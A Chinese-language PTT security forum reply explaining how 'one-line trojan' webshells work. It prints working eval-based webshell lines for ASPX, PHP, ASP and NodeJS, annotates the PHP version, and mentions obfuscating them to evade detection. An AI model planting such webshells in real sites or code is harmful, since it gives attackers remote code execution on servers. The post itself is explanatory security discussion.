Re: [問題] 一句話木馬
※ 引述《newnovice (serenity)》之銘言:
: 在網路上看到這個東東
: <%@ Page Language="Jscript" validateRequest="false"
: %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
: 挺有趣的,有大神可以解釋這一行作用嗎,感謝。
我曾經比較熟 PHP 版本的一句話木馬 畢竟 PHP[0] 是最厲害的程式語言 (疑)
PHP 版本的一句話木馬木馬可以是 <?php eval($_POST['x']); ?>
PHP 本身就是一種樣板 (Template) 語言 他可以在後端執行程式、結果渲染在前端
如果 熟悉 PHP 或者看過上一篇的推文可以知道 這段程式碼可以拆解成
<?php // PHP start symbol
eval( // builtin function and execute any PHP source code
$_POST['x'] // data from POST method which key is 'x'
);
?> // PHP end symbol
可以發現重點在於透過一句話木馬的 eval 來執行任意 PHP 程式碼
這代表類似功能的網頁語言都可以有一句話木馬 像是
ASP 版本的 <%eval request (x); %>
NodeJS 的 eval(req.query.pass)
都是透過 eval 等程式語言內建可以執行程式碼本身的功能
而怎麼利用一句話木馬 就要問你程式功力如何了 (煙)
你可以用程式做到什麼事情 一句話木馬就可以做到 80~99% 的事情
進階的問題則是如何隱藏一句話木馬 畢竟這年頭一句話木馬已經被廣泛(?)使用
大多數安全軟體都宣稱可防範一句話木馬
在我之前的文章[1] 有提到混淆 Webshell 的例子
就是透過一大堆 _ 來組成 webshell 需要的內容
至於一句話木馬可以造成的危害 就是系統設定跟提權的問題
假若你的 Web Service 是用 root 執行 那透過一句話木馬跟拿到 reversed shell 沒有太大的差別
如果有降權或者跑在 docker 裡面 那一句話木馬能造成的危害
大概就是讓你的電腦 替區塊鏈世界盡一分心力
[0]: https://zh.wikipedia.org/wiki/PHP
[1]: https://www.ptt.cc/bbs/NetSecurity/M.1517412273.A.E5F.html
--
※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 106.1.224.240
※ 文章網址: https://www.ptt.cc/bbs/NetSecurity/M.1558754535.A.B34.html
※ 編輯: CMJ0121 (106.1.224.240), 05/25/2019 11:23:25
推
05/25 20:09,
5年前
, 1F
05/25 20:09, 1F
→
05/25 20:10,
5年前
, 2F
05/25 20:10, 2F
推
05/25 20:12,
5年前
, 3F
05/25 20:12, 3F
推
05/25 23:19,
5年前
, 4F
05/25 23:19, 4F
→
05/25 23:20,
5年前
, 5F
05/25 23:20, 5F
討論串 (同標題文章)
NetSecurity 近期熱門文章
PTT數位生活區 即時熱門文章